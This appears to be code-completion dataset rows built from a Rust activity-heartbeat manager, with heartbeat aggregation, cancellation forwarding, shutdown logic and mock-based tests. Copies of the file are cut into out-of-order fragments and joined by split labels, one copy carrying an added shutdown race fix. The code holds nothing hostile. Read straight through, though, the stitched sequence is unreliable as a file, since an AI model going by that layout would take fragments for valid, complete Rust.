struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat | if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
} | /// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion. | random_line_split |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
/// Aggregates activity heartbeats and owns the per-activity processor tasks. Runs inside its
/// own tokio task; user code interacts with it through `ActivityHeartbeatManagerHandle`.
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
/// Cloned into each processor so it can request its own cleanup.
events_tx: UnboundedSender<LifecycleEvent>,
/// Receives heartbeat / cleanup / shutdown events from the handle and the processors.
events_rx: UnboundedReceiver<LifecycleEvent>,
/// Broadcasts the shutdown signal to every processor.
shutdown_tx: Sender<bool>,
/// Prototype receiver cloned into each spawned processor.
shutdown_rx: Receiver<bool>,
/// Processors report server-requested cancellations through this channel.
cancels_tx: UnboundedSender<TaskToken>,
/// Gateway used to issue the heartbeat RPCs.
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
/// Set once shutdown has been requested; `record` refuses new heartbeats afterwards.
shutting_down: AtomicBool,
/// Sends lifecycle events into the manager's event loop.
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [`ActivityHeartbeatManagerHandle::next_pending_cancel`]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
/// Watch channel feeding the latest heartbeat payloads to the processor task.
heartbeat_tx: Sender<Vec<common::Payload>>,
/// Awaited during manager shutdown so in-flight requests can finish first.
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
/// Task token of the single activity this processor heartbeats for.
task_token: TaskToken,
/// Interval between server calls (1/2 of the activity heartbeat timeout — see `run`).
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
/// Gateway used to issue the actual heartbeat RPCs.
server_gateway: Arc<SG>,
}
/// Events processed by the manager's lifecycle loop.
#[derive(Debug)]
pub enum LifecycleEvent {
/// A validated heartbeat to route to (or spawn) the activity's processor.
Heartbeat(ValidActivityHeartbeat),
/// A processor finished; remove its entry from the manager's map.
CleanupProcessor(TaskToken),
/// Stop the lifecycle loop and shut all processors down.
Shutdown,
}
/// A heartbeat that passed validation in `record`, carried by `LifecycleEvent::Heartbeat`.
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
/// Token identifying the activity being heartbeated.
pub task_token: TaskToken,
/// Latest heartbeat payloads; newer details replace older, unsent ones (watch channel).
pub details: Vec<common::Payload>,
/// How long the processor waits between server calls.
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
    /// Records a new heartbeat, note that first call would result in an immediate call to the
    /// server, while rapid successive calls would accumulate for up to `delay`
    /// and then latest heartbeat details will be sent to the server. If there is no activity for
    /// `delay` then heartbeat processor will be reset and process would start
    /// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
    ///
    /// # Errors
    /// Returns [`ActivityHeartbeatError::ShuttingDown`] once `shutdown` has been requested.
    pub fn record(
        &self,
        details: ActivityHeartbeat,
        delay: Duration,
    ) -> Result<(), ActivityHeartbeatError> {
        if self.shutting_down.load(Ordering::Relaxed) {
            return Err(ActivityHeartbeatError::ShuttingDown);
        }
        self.events
            .send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
                task_token: TaskToken(details.task_token),
                details: details.details,
                delay,
            }))
            .expect("Receive half of the heartbeats event channel must not be dropped");
        Ok(())
    }
    /// Returns a future that resolves any time there is a new activity cancel that must be
    /// dispatched to lang
    pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
        self.incoming_cancels.lock().await.recv().await
    }
    /// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
    /// processors to terminate gracefully.
    pub async fn shutdown(&self) {
        // `swap` atomically claims the right to send the shutdown event, so exactly one caller
        // sends it even when `shutdown` is invoked concurrently. The previous load-then-store
        // pair raced: two callers could both observe `false` and both send `Shutdown`, and the
        // second `send` could panic on its `expect` once the lifecycle task (which owns the
        // receive half) had already exited after the first event.
        if !self.shutting_down.swap(true, Ordering::Relaxed) {
            self.events
                .send(LifecycleEvent::Shutdown)
                .expect("should be able to send shutdown event");
        }
        // Await the manager task; `take` makes repeated `shutdown` calls a cheap no-op here.
        let mut handle = self.join_handle.lock().await;
        if let Some(h) = handle.take() {
            h.await.expect("shutdown should exit cleanly");
        }
    }
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
// The manager itself is moved into this task; the handle is the only way to reach it.
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
// Loop exited (Shutdown event or all senders dropped): stop every processor.
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
// The watch channel is seeded with the first payloads; the processor sends
// them to the server immediately on startup (see ActivityHeartbeatProcessor::run).
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
// Await every processor so in-flight heartbeat RPCs finish before we return.
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
/// Per-activity loop: send the seeded heartbeat immediately, then at most one
/// server call per `delay`, exiting on shutdown or after 2 * `delay` of inactivity.
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
// Throttle: at most one server call per `delay`, regardless of how many
// heartbeats accumulate in the watch channel meanwhile.
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
// Ask the manager to drop this processor's entry from its map.
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
/// Sends the latest heartbeat details to the server and forwards any
/// cancellation the server reports back up through `cancels_tx`.
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() |
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
} | identifier_body |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
/// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion.
if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
